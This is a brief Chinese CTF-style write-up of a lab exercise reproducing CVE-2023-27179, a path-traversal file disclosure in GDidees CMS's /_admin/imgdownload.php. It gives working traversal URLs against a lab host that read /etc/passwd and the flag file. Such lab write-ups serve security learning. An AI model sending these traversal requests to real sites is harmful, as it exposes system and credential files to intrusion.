漏洞簡介：

GDidees CMS v3.9.1及更低版本被發現存在本地文件泄露漏洞，漏洞通過位于 /_admin/imgdownload.php 的 filename 參數進行利用。

漏洞環境：

春秋云鏡中的漏洞靶標，CVE編號為CVE-2023-27179

漏洞復現:

進入靶場發現沒有什么可以利用的地方，那么就按照靶場提示來，直接訪問/_admin/imgdownload.php

打開后發現是一片空白，那么直接上參數filename

第一次嘗試

http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd

發現下載了一張圖片

用notepad++打開圖片發現確實獲取到了用戶的信息

那么直接獲取flag

eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag

?

或者還有一種辦法是我們用bp抓包，放到重放器里，可以直接回顯出文件內容

或者是直接用curl指令請求

?